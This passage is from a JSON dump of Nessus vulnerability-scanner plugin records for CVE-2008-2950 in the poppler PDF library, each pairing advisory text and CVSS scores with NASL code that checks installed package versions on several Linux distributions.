exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE11\\.0)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"11.0\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE11.0\", reference:\"libpoppler-devel-0.8.2-1.2\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"libpoppler-glib-devel-0.8.2-1.2\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"libpoppler-glib3-0.8.2-1.2\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"libpoppler-qt2-0.8.2-1.2\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"libpoppler-qt3-devel-0.8.2-1.2\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"libpoppler-qt4-3-0.8.2-1.2\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"libpoppler-qt4-devel-0.8.2-1.2\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"libpoppler3-0.8.2-1.2\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"poppler-tools-0.8.2-1.2\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"poppler\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-02-21T01:11:39", "bulletinFamily": "scanner", "description": "A memory management issue 
was found in libpoppler by Felipe Andres Manzano that could allow for the execution of arbitrary code with the privileges of the user running a poppler-based application, if they opened a specially crafted PDF file (CVE-2008-2950).\n\nThe updated packages have been patched to correct this issue.", "modified": "2018-07-19T00:00:00", "id": "MANDRIVA_MDVSA-2008-146.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=36531", "published": "2009-04-23T00:00:00", "title": "Mandriva Linux Security Advisory : poppler (MDVSA-2008:146)", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 70103\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandriva Linux Security Advisory MDVSA-2008:146. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(36531);\n script_version (\"1.13\");\n script_cvs_date(\"Date: 2018/07/19 20:59:15\");\n\n script_cve_id(\"CVE-2008-2950\");\n script_xref(name:\"MDVSA\", value:\"2008:146\");\n\n script_name(english:\"Mandriva Linux Security Advisory : poppler (MDVSA-2008:146)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandriva Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A memory management issue was found in libpoppler by Felipe Andres\nManzano that could allow for the execution of arbitrary code with the\nprivileges of the user running a poppler-based application, if they\nopened a specially crafted PDF file (CVE-2008-2950).\n\nThe updated packages have been patched to correct this issue.\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_cwe_id(94);\n\n 
script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64poppler-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64poppler-glib-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64poppler-glib2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64poppler-qt-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64poppler-qt2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64poppler-qt4-2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64poppler-qt4-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64poppler2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libpoppler-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libpoppler-glib-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libpoppler-glib2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libpoppler-qt-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libpoppler-qt2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libpoppler-qt4-2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libpoppler-qt4-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libpoppler2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:poppler\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:linux:2008.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:linux:2008.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/07/15\");\n 
script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/04/23\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK2008.0\", cpu:\"x86_64\", reference:\"lib64poppler-devel-0.6-3.2mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", cpu:\"x86_64\", reference:\"lib64poppler-glib-devel-0.6-3.2mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", cpu:\"x86_64\", reference:\"lib64poppler-glib2-0.6-3.2mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", cpu:\"x86_64\", reference:\"lib64poppler-qt-devel-0.6-3.2mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", cpu:\"x86_64\", reference:\"lib64poppler-qt2-0.6-3.2mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", cpu:\"x86_64\", reference:\"lib64poppler-qt4-2-0.6-3.2mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", cpu:\"x86_64\", reference:\"lib64poppler-qt4-devel-0.6-3.2mdv2008.0\", yank:\"mdv\")) flag++;\nif 
(rpm_check(release:\"MDK2008.0\", cpu:\"x86_64\", reference:\"lib64poppler2-0.6-3.2mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", cpu:\"i386\", reference:\"libpoppler-devel-0.6-3.2mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", cpu:\"i386\", reference:\"libpoppler-glib-devel-0.6-3.2mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", cpu:\"i386\", reference:\"libpoppler-glib2-0.6-3.2mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", cpu:\"i386\", reference:\"libpoppler-qt-devel-0.6-3.2mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", cpu:\"i386\", reference:\"libpoppler-qt2-0.6-3.2mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", cpu:\"i386\", reference:\"libpoppler-qt4-2-0.6-3.2mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", cpu:\"i386\", reference:\"libpoppler-qt4-devel-0.6-3.2mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", cpu:\"i386\", reference:\"libpoppler2-0.6-3.2mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"poppler-0.6-3.2mdv2008.0\", yank:\"mdv\")) flag++;\n\nif (rpm_check(release:\"MDK2008.1\", cpu:\"x86_64\", reference:\"lib64poppler-devel-0.6.4-2.1mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", cpu:\"x86_64\", reference:\"lib64poppler-glib-devel-0.6.4-2.1mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", cpu:\"x86_64\", reference:\"lib64poppler-glib2-0.6.4-2.1mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", cpu:\"x86_64\", reference:\"lib64poppler-qt-devel-0.6.4-2.1mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", cpu:\"x86_64\", reference:\"lib64poppler-qt2-0.6.4-2.1mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", cpu:\"x86_64\", reference:\"lib64poppler-qt4-2-0.6.4-2.1mdv2008.1\", yank:\"mdv\")) 
flag++;\nif (rpm_check(release:\"MDK2008.1\", cpu:\"x86_64\", reference:\"lib64poppler-qt4-devel-0.6.4-2.1mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", cpu:\"x86_64\", reference:\"lib64poppler2-0.6.4-2.1mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", cpu:\"i386\", reference:\"libpoppler-devel-0.6.4-2.1mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", cpu:\"i386\", reference:\"libpoppler-glib-devel-0.6.4-2.1mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", cpu:\"i386\", reference:\"libpoppler-glib2-0.6.4-2.1mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", cpu:\"i386\", reference:\"libpoppler-qt-devel-0.6.4-2.1mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", cpu:\"i386\", reference:\"libpoppler-qt2-0.6.4-2.1mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", cpu:\"i386\", reference:\"libpoppler-qt4-2-0.6.4-2.1mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", cpu:\"i386\", reference:\"libpoppler-qt4-devel-0.6.4-2.1mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", cpu:\"i386\", reference:\"libpoppler2-0.6.4-2.1mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"poppler-0.6.4-2.1mdv2008.1\", yank:\"mdv\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-02-21T01:11:11", "bulletinFamily": "scanner", "description": "Security fix: Add upstream patch for CVE-2008-2950 / oCERT-2008-007 - use of an uninitialized pointer to call free() in Page::~Page (#454277) http://www.ocert.org/advisories/ocert-2008-007.html Bug fixes: Fix crash when reading QuadPoints (#448516) Use static 
FT_Library in CairoOutputDev, as dynamic may trigger use-after-free and crash e.g. evince (#456867)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "modified": "2018-12-24T00:00:00", "id": "FEDORA_2008-7012.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=34172", "published": "2008-09-12T00:00:00", "title": "Fedora 9 : poppler-0.8.1-2.fc9 (2008-7012)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2008-7012.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(34172);\n script_version (\"1.15\");\n script_cvs_date(\"Date: 2018/12/24 10:14:26\");\n\n script_cve_id(\"CVE-2008-2950\");\n script_xref(name:\"FEDORA\", value:\"2008-7012\");\n\n script_name(english:\"Fedora 9 : poppler-0.8.1-2.fc9 (2008-7012)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Security fix: Add upstream patch for CVE-2008-2950 / oCERT-2008-007 -\nuse of an uninitialized pointer to call free() in Page::~Page\n(#454277) http://www.ocert.org/advisories/ocert-2008-007.html Bug\nfixes: Fix crash when reading QuadPoints (#448516) Use static\nFT_Library in CairoOutputDev, as dynamic may trigger use-after-free\nand crash e.g. evince (#456867)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n # http://www.ocert.org/advisories/ocert-2008-007.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://ocert.org/advisories/ocert-2008-007.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=454277\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2008-September/014228.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?dfe84d59\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected poppler package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_cwe_id(94);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:poppler\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:9\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/09/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2008/09/12\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2008-2018 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^9([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 9.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC9\", reference:\"poppler-0.8.1-2.fc9\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"poppler\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-02-21T01:11:06", "bulletinFamily": "scanner", "description": "Felipe Andres Manzano discovered that poppler did not correctly initialize certain page widgets. 
If a user were tricked into viewing a malicious PDF file, a remote attacker could exploit this to crash applications linked against poppler, leading to a denial of service.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "modified": "2019-01-02T00:00:00", "id": "UBUNTU_USN-631-1.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=33760", "published": "2008-07-29T00:00:00", "title": "Ubuntu 7.10 / 8.04 LTS : poppler vulnerability (USN-631-1)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-631-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(33760);\n script_version(\"1.14\");\n script_cvs_date(\"Date: 2019/01/02 16:37:56\");\n\n script_cve_id(\"CVE-2008-2950\");\n script_bugtraq_id(30107);\n script_xref(name:\"USN\", value:\"631-1\");\n\n script_name(english:\"Ubuntu 7.10 / 8.04 LTS : poppler vulnerability (USN-631-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Felipe Andres Manzano discovered that poppler did not correctly\ninitialize certain page widgets. 
If a user were tricked into viewing a\nmalicious PDF file, a remote attacker could exploit this to crash\napplications linked against poppler, leading to a denial of service.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/631-1/\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:ND\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(94);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libpoppler-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libpoppler-glib-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libpoppler-glib2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libpoppler-qt-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libpoppler-qt2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libpoppler-qt4-2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libpoppler-qt4-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libpoppler2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:poppler-utils\");\n script_set_attribute(attribute:\"cpe\", 
value:\"cpe:/o:canonical:ubuntu_linux:7.10\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:8.04:-:lts\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/07/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2008/07/29\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2008-2019 Canonical, Inc. / NASL script (C) 2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! ereg(pattern:\"^(7\\.10|8\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 7.10 / 8.04\", \"Ubuntu \" + release);\nif ( ! 
get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"7.10\", pkgname:\"libpoppler-dev\", pkgver:\"0.6-0ubuntu2.3\")) flag++;\nif (ubuntu_check(osver:\"7.10\", pkgname:\"libpoppler-glib-dev\", pkgver:\"0.6-0ubuntu2.3\")) flag++;\nif (ubuntu_check(osver:\"7.10\", pkgname:\"libpoppler-glib2\", pkgver:\"0.6-0ubuntu2.3\")) flag++;\nif (ubuntu_check(osver:\"7.10\", pkgname:\"libpoppler-qt-dev\", pkgver:\"0.6-0ubuntu2.3\")) flag++;\nif (ubuntu_check(osver:\"7.10\", pkgname:\"libpoppler-qt2\", pkgver:\"0.6-0ubuntu2.3\")) flag++;\nif (ubuntu_check(osver:\"7.10\", pkgname:\"libpoppler-qt4-2\", pkgver:\"0.6-0ubuntu2.3\")) flag++;\nif (ubuntu_check(osver:\"7.10\", pkgname:\"libpoppler-qt4-dev\", pkgver:\"0.6-0ubuntu2.3\")) flag++;\nif (ubuntu_check(osver:\"7.10\", pkgname:\"libpoppler2\", pkgver:\"0.6-0ubuntu2.3\")) flag++;\nif (ubuntu_check(osver:\"7.10\", pkgname:\"poppler-utils\", pkgver:\"0.6-0ubuntu2.3\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"libpoppler-dev\", pkgver:\"0.6.4-1ubuntu3.1\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"libpoppler-glib-dev\", pkgver:\"0.6.4-1ubuntu3.1\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"libpoppler-glib2\", pkgver:\"0.6.4-1ubuntu3.1\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"libpoppler-qt-dev\", pkgver:\"0.6.4-1ubuntu3.1\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"libpoppler-qt2\", pkgver:\"0.6.4-1ubuntu3.1\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"libpoppler-qt4-2\", pkgver:\"0.6.4-1ubuntu3.1\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"libpoppler-qt4-dev\", pkgver:\"0.6.4-1ubuntu3.1\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"libpoppler2\", pkgver:\"0.6.4-1ubuntu3.1\")) flag++;\nif 
(ubuntu_check(osver:\"8.04\", pkgname:\"poppler-utils\", pkgver:\"0.6.4-1ubuntu3.1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libpoppler-dev / libpoppler-glib-dev / libpoppler-glib2 / etc\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-02-21T01:11:03", "bulletinFamily": "scanner", "description": "The remote host is affected by the vulnerability described in GLSA-200807-04 (Poppler: User-assisted execution of arbitrary code)\n\n Felipe Andres Manzano reported a memory management issue in the Page class constructor/destructor.\n Impact :\n\n A remote attacker could entice a user to open a specially crafted PDF file with a Poppler-based PDF viewer such as Gentoo's Xpdf, Epdfview, or Evince, potentially resulting in the execution of arbitrary code with the privileges of the user running the application.\n Workaround :\n\n There is no known workaround at this time.", "modified": "2018-08-10T00:00:00", "id": "GENTOO_GLSA-200807-04.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=33461", "published": "2008-07-10T00:00:00", "title": "GLSA-200807-04 : Poppler: User-assisted execution of arbitrary code", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 200807-04.\n#\n# The advisory text is Copyright (C) 2001-2015 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. 
See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(33461);\n script_version(\"1.15\");\n script_cvs_date(\"Date: 2018/08/10 18:07:07\");\n\n script_cve_id(\"CVE-2008-2950\");\n script_xref(name:\"GLSA\", value:\"200807-04\");\n\n script_name(english:\"GLSA-200807-04 : Poppler: User-assisted execution of arbitrary code\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-200807-04\n(Poppler: User-assisted execution of arbitrary code)\n\n Felipe Andres Manzano reported a memory management issue in the Page\n class constructor/destructor.\n \nImpact :\n\n A remote attacker could entice a user to open a specially crafted PDF\n file with a Poppler-based PDF viewer such as Gentoo's Xpdf, Epdfview,\n or Evince, potentially resulting in the execution of arbitrary code\n with the privileges of the user running the application.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/200807-04\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All poppler users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=app-text/poppler-0.6.3-r1'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_cwe_id(94);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", 